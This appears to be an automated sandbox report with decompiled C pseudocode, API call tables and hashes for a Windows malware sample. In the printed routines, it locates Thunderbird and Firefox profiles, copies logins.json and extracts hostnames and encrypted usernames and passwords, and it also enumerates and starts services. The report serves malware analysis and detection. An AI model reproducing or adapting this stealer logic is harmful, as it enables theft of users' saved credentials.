                                      0x00259d6e
                                      0x00259d73
                                      0x00259d73
                                      0x00259d79
                                      0x00259d80
                                      0x00259d87
                                      0x00259d8a
                                      0x00259d92
                                      0x00259d95
                                      0x00259d9d
                                      0x00259da2
                                      0x00259da5
                                      0x00259da5
                                      0x00259a52
                                      0x00259a21
                                      0x00259a21
                                      0x00259a24
                                      0x00259a2c
                                      0x00259a2c
                                      0x00259da8
                                      0x00259da8
                                      0x00259dd3
                                      0x00259ddd
                                      0x00259dde
                                      0x00259dde
                                      0x00259de6
                                      0x00259de6
                                      0x00259dee
                                      0x00259df6
                                      0x00259e01

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                        • Part of subcall function 0025ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                        • Part of subcall function 0025ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                        • Part of subcall function 0025ADBE: RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                        • Part of subcall function 0025ADBE: RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      • lstrcatW.KERNEL32(?,\firefox.exe), ref: 00259932
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 00259943
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00259DC3
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025309F: wsprintfW.USER32 ref: 002530BA
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00254AC0,?), ref: 002533AE
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 002533D9
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00259ABA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                      • API String ID: 288196626-815594582
                                      • Opcode ID: ef592556e462bc40670561ee594be43bc04a5cd2c78c8ab641f1b63ab1b6b267
                                      • Instruction ID: 69640ea2bef286e953319be3ba0a30ae43cdcda0daa51e678d817aef00bcec6c
                                      • Opcode Fuzzy Hash: ef592556e462bc40670561ee594be43bc04a5cd2c78c8ab641f1b63ab1b6b267
                                      • Instruction Fuzzy Hash: 8AE12E71920519DBCF14EBA0DC929EEB779AF04302F104169E916B7192EF30AE6DCF58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025936E, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0025936E(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E00253412( &_v24, L"Profile");
				_t279 = 0;
				E00251052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00251052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0025ADBE(L"thunderbird.exe",  &_v704, _t396);
				E00253412( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E0025345A(_t395,  &_v44);
				_t289 = _t385;
				if(E0025A324(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E00253297( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0025345A( &_v36,  &_a4);
					E00253297( &_v36, _t381, __eflags, L"profiles.ini");
					E00253264( &_v24, E00253412( &_v40, L"Profile"));
					E00255A2D(_v40);
					E0025309F( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E00253264( &_v24, E00253412( &_v60, L"Profile"));
						E00255A2D(_v60);
						_v60 = _t279;
						E0025309F( &_v24, _t381, __eflags, _v56 + 1);
						E0025345A( &_v12,  &_a4);
						E00253297( &_v12, _t381, __eflags,  &_v1224);
						E00253381( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0025345A( &_v20,  &_v12);
									E00253297( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E0025D75B( &_v16, _t382, __eflags);
									E00253297( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E00253162( &_v16, __eflags, E002532D4( &_v64, _t381, __eflags));
									E00255A2D(_v64);
									_v64 = _t279;
									E00253297( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E00253264( &_v20,  &_v16);
										_t386 = _v20;
									}
									E0025DE6C( &_v184, __eflags);
									_t321 =  &_v180;
									E00253264(_t321,  &_v20);
									_push(_t321);
									_t200 = E0025E130( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0025DDDB( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E002531EC( &_v104, "encryptedUsername");
										_t210 = E00252D59( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E00258B5D(_t210, _t208, __eflags);
										_v108 = _t281;
										E00255A2D(_v160);
										_t332 = _v104;
										E00255A2D(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E002531EC( &_v116, "hostname");
												E00258B96( &_v40, E00252D59( &_v52,  &_v112), __eflags, _t223, _t393);
												E00255A2D(_v112);
												E00255A2D(_v116);
												_t229 = E002531EC( &_v124, "encryptedUsername");
												E00258B96( &_v84, E00252D59( &_v52,  &_v120), __eflags, _t229, _t393);
												E00255A2D(_v120);
												E00255A2D(_v124);
												_t235 = E002531EC( &_v132, "encryptedPassword");
												_t381 = E00252D59( &_v52,  &_v128);
												E00258B96( &_v80, _t237, __eflags, _t235, _t393);
												E00255A2D(_v128);
												E00255A2D(_v132);
												E00259E04(_t387, __eflags, _v84,  &_v136);
												E00259E04(_t387, __eflags, _v80,  &_v144);
												E00253264( &_v100, E00252ECA( &_v40, __eflags,  &_v68));
												E00255A2D(_v68);
												_v68 = 0;
												E00253264( &_v96, E00252ECA(E002531EC( &_v140, _v136), __eflags,  &_v72));
												E00255A2D(_v72);
												_v72 = 0;
												E00255A2D(_v140);
												E00253264( &_v92, E00252ECA(E002531EC( &_v148, _v144), __eflags,  &_v76));
												E00255A2D(_v76);
												_v76 = 0;
												E00255A2D(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E00251EB9(_t395,  &_v100);
												E00251EEF(_t387);
												E00255A2D(_v80);
												E00255A2D(_v84);
												E00255A2D(_v40);
												_t332 =  &_v100;
												E0025138F( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0025345A(_t395,  &_v16);
											E0025DEA9(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E00252E66( &_v52);
										_t323 =  &_v184;
									}
									E0025DE8B(_t323, __eflags);
									E00255A2D(_t392);
									_v16 = _t279;
									E00255A2D(_t386);
									_v20 = _t279;
									E00255A2D(_v28);
									E00255A2D(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E00255A2D(_v28);
							E00255A2D(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0025A2CD(_t385);
					_t279 = 1;
					__eflags = 1;
					E00255A2D(_v36);
				} else {
					E0025345A(_t395,  &_v44);
					if(E0025A324(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E00255A2D(_v44);
				E00255A2D(_t389);
				E00255A2D(_a4);
				return _t279;
			}




































































                                      0x0025936e
                                      0x0025937a
                                      0x00259384
                                      0x00259387
                                      0x00259391
                                      0x0025939b
                                      0x002593a5
                                      0x002593af
                                      0x002593b7
                                      0x002593bc
                                      0x002593bf
                                      0x002593ca
                                      0x002593da
                                      0x002593ed
                                      0x002593fa
                                      0x002593ff
                                      0x00259408
                                      0x00259429
                                      0x00259431
                                      0x0025943d
                                      0x0025944a
                                      0x00259460
                                      0x00259468
                                      0x00259471
                                      0x00259476
                                      0x00259479
                                      0x0025985f
                                      0x0025985f
                                      0x00259870
                                      0x00259876
                                      0x00259878
                                      0x00000000
                                      0x00000000
                                      0x0025948b
                                      0x00259497
                                      0x0025949f
                                      0x002594a8
                                      0x002594ab
                                      0x002594b7
                                      0x002594c6
                                      0x002594d2
                                      0x002594da
                                      0x002594de
                                      0x002594e0
                                      0x002594f7
                                      0x002594fd
                                      0x00259503
                                      0x00259505
                                      0x00000000
                                      0x00259507
                                      0x0025950b
                                      0x0025950e
                                      0x00259511
                                      0x00259513
                                      0x00000000
                                      0x00259515
                                      0x0025951c
                                      0x00259529
                                      0x00259530
                                      0x00259534
                                      0x00259541
                                      0x00259548
                                      0x00259555
                                      0x0025955d
                                      0x0025956a
                                      0x0025956d
                                      0x00259572
                                      0x00259575
                                      0x00259581
                                      0x00259583
                                      0x0025958c
                                      0x00259591
                                      0x00259591
                                      0x0025959a
                                      0x002595a3
                                      0x002595a9
                                      0x002595ae
                                      0x002595ba
                                      0x002595bf
                                      0x002595c5
                                      0x002595c7
                                      0x002595d7
                                      0x002595db
                                      0x002595de
                                      0x002595eb
                                      0x002595fc
                                      0x00259601
                                      0x00259610
                                      0x00259612
                                      0x00259615
                                      0x0025961a
                                      0x0025961d
                                      0x00259622
                                      0x00259624
                                      0x002597e5
                                      0x002597e5
                                      0x0025962a
                                      0x0025962a
                                      0x0025962d
                                      0x0025962d
                                      0x0025962f
                                      0x00259632
                                      0x0025963b
                                      0x0025963e
                                      0x00259641
                                      0x00259644
                                      0x0025965b
                                      0x00259665
                                      0x0025966d
                                      0x0025967b
                                      0x00259692
                                      0x0025969c
                                      0x002596a4
                                      0x002596b2
                                      0x002596c4
                                      0x002596c9
                                      0x002596d3
                                      0x002596db
                                      0x002596ec
                                      0x002596fd
                                      0x00259712
                                      0x0025971a
                                      0x00259722
                                      0x00259742
                                      0x0025974a
                                      0x00259755
                                      0x00259758
                                      0x0025977d
                                      0x00259785
                                      0x00259790
                                      0x00259793
                                      0x00259798
                                      0x0025979b
                                      0x002597a8
                                      0x002597af
                                      0x002597b7
                                      0x002597bf
                                      0x002597c7
                                      0x002597cc
                                      0x002597cf
                                      0x002597d4
                                      0x002597d4
                                      0x002597d4
                                      0x002597dd
                                      0x002597e0
                                      0x002597e0
                                      0x002597e8
                                      0x002597ee
                                      0x002597f0
                                      0x002597f9
                                      0x002597fe
                                      0x00259803
                                      0x0025980d
                                      0x00259817
                                      0x0025981d
                                      0x00259822
                                      0x00259822
                                      0x00259828
                                      0x0025982f
                                      0x00259836
                                      0x00259839
                                      0x00259841
                                      0x00259844
                                      0x0025984c
                                      0x00259851
                                      0x00259851
                                      0x00259513
                                      0x002594e2
                                      0x002594e2
                                      0x002594e5
                                      0x002594ed
                                      0x002594ed
                                      0x00259854
                                      0x00259857
                                      0x0025985a
                                      0x0025985a
                                      0x00259880
                                      0x0025988a
                                      0x0025988a
                                      0x0025988b
                                      0x0025940a
                                      0x00259411
                                      0x0025941f
                                      0x00000000
                                      0x00259421
                                      0x00259421
                                      0x00259421
                                      0x0025941f
                                      0x00259893
                                      0x0025989a
                                      0x002598a2
                                      0x002598ad

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                        • Part of subcall function 0025ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                        • Part of subcall function 0025ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                        • Part of subcall function 0025ADBE: RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                        • Part of subcall function 0025ADBE: RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 002593ED
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025A324: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0025A352
                                        • Part of subcall function 0025A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A35B
                                        • Part of subcall function 0025A324: PathFileExistsW.SHLWAPI(00259406), ref: 0025A449
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00259870
                                        • Part of subcall function 0025A324: PathFileExistsW.SHLWAPI(00259406), ref: 0025A4A5
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4E4
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4EF
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4FA
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A505
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A510
                                        • Part of subcall function 0025A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                      • API String ID: 1065485167-1863067114
                                      • Opcode ID: 8b9a37aee03fc5781b4f2b9d21a62d5b4559e164b9fb449e704c55328005a4ee
                                      • Instruction ID: df5f71c74965be21c75bed4a31c0d121674dc8a7e3cb7533ede2793f406a921e
                                      • Opcode Fuzzy Hash: 8b9a37aee03fc5781b4f2b9d21a62d5b4559e164b9fb449e704c55328005a4ee
                                      • Instruction Fuzzy Hash: 08E13D71D205189BCF15EBA0DC929EEB779AF04302F104169E916B7192EF30AE6DCF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025B889, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025B889(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}








                                      0x0025b895
                                      0x0025b898
                                      0x0025b89e
                                      0x0025b8a2
                                      0x0025b8b3
                                      0x0025b8b7
                                      0x0025b8cf
                                      0x0025b8f6
                                      0x0025b8f8
                                      0x0025b8f9
                                      0x0025b900
                                      0x0025b903
                                      0x0025b905
                                      0x0025b907
                                      0x00000000
                                      0x0025b907
                                      0x0025b8dc
                                      0x00000000
                                      0x00000000
                                      0x0025b8e3
                                      0x0025b8f4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025b8f4
                                      0x0025b8ba
                                      0x0025b8c0
                                      0x00000000
                                      0x0025b8c0
                                      0x0025b90b

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B898
                                      • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0025B8AD
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B8BA
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0025B8C7
                                      • GetLastError.KERNEL32 ref: 0025B8D1
                                      • Sleep.KERNEL32(000007D0), ref: 0025B8E3
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0025B8EC
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B900
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                      • String ID: ServicesActive
                                      • API String ID: 104619213-3071072050
                                      • Opcode ID: e4e656074cca0ebf14f99db79e537377bc2a5b7e2c9c0631aed58a810af93f77
                                      • Instruction ID: 1d542f88cd5da647dd5c71bfc269cfb31e6196126f0b49ba23fa9b48d36a8f1b
                                      • Opcode Fuzzy Hash: e4e656074cca0ebf14f99db79e537377bc2a5b7e2c9c0631aed58a810af93f77
                                      • Instruction Fuzzy Hash: 3401A271311616FBD3221F66BD8CE6B3E6CDFD6B62B009021FA05D6150DBB4C818CAB4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025BDDC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 89%
                                      			E0025BDDC(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E00255A2D(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00255A87(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E00253412( &_v12,  *_t91);
						if(E00253075( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E00253264( &_v24, E00253412( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E00255A2D(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E00255A2D(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E00253412( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E00253412(_t119,  *_t112);
										E002520E1(_t92 + 0x40,  &_v12);
									}
									E00255A2D(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0025B81D(_v32, 2);
							E0025B889(_v32);
							_v36 = 1;
							E002510C1(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E00255A2D(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}


























                                      0x0025bde7
                                      0x0025bdf1
                                      0x0025bdf4
                                      0x0025bdf7
                                      0x0025bdfa
                                      0x0025bdfd
                                      0x0025be00
                                      0x0025be09
                                      0x0025be0d
                                      0x0025bebd
                                      0x0025bebd
                                      0x0025bec1
                                      0x0025bec4
                                      0x0025bed0
                                      0x0025bed0
                                      0x0025be16
                                      0x0025be1d
                                      0x0025be20
                                      0x0025be20
                                      0x0025be2a
                                      0x0025be3a
                                      0x0025be40
                                      0x0025be45
                                      0x0025be4c
                                      0x0025be56
                                      0x0025be63
                                      0x0025be6b
                                      0x00000000
                                      0x00000000
                                      0x0025be7b
                                      0x0025be81
                                      0x0025be86
                                      0x00000000
                                      0x00000000
                                      0x0025be88
                                      0x0025be8a
                                      0x0025be94
                                      0x0025bea6
                                      0x0025bed1
                                      0x0025bee3
                                      0x0025beeb
                                      0x0025bef0
                                      0x0025befa
                                      0x0025befe
                                      0x0025bf01
                                      0x0025bf06
                                      0x0025bf0e
                                      0x0025bf51
                                      0x0025bf54
                                      0x0025bf58
                                      0x00000000
                                      0x00000000
                                      0x0025bf5e
                                      0x0025bf6d
                                      0x0025bfaa
                                      0x0025bfaa
                                      0x0025bfab
                                      0x0025bfb0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025bfb2
                                      0x0025bf74
                                      0x0025bf87
                                      0x0025bf8e
                                      0x0025bf96
                                      0x0025bf96
                                      0x0025bf9e
                                      0x0025bfa3
                                      0x0025bfa7
                                      0x00000000
                                      0x0025bfa7
                                      0x00000000
                                      0x0025bf5e
                                      0x0025bf16
                                      0x00000000
                                      0x00000000
                                      0x0025bf1e
                                      0x0025bf24
                                      0x0025bf2a
                                      0x0025bf2d
                                      0x0025bf42
                                      0x0025bf46
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025bf4c
                                      0x0025beab
                                      0x0025beb0
                                      0x0025beb4
                                      0x0025beb7
                                      0x0025bebb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025bebb
                                      0x00000000
                                      0x0025be8a
                                      0x00000000

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0025BE03
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0025BE3A
                                        • Part of subcall function 00255A87: GetProcessHeap.KERNEL32(00000000,?,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A8A
                                        • Part of subcall function 00255A87: RtlAllocateHeap.NTDLL(00000000,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000,?,?,00000000), ref: 00255A91
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0025BE63
                                      • GetLastError.KERNEL32 ref: 0025BE6D
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025BE7B
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0025BF3C
                                      • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0025BF7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                      • String ID: ServicesActive
                                      • API String ID: 899334174-3071072050
